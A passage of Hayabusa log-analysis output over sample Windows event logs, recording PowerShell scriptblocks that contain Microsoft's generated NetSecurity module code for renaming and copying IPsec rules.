${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] 
[ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryp",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"toSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try 
{ __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) 
$__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName 
)) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickMod",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"eCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, 
$__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Copy-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] 
${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] 
[ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, 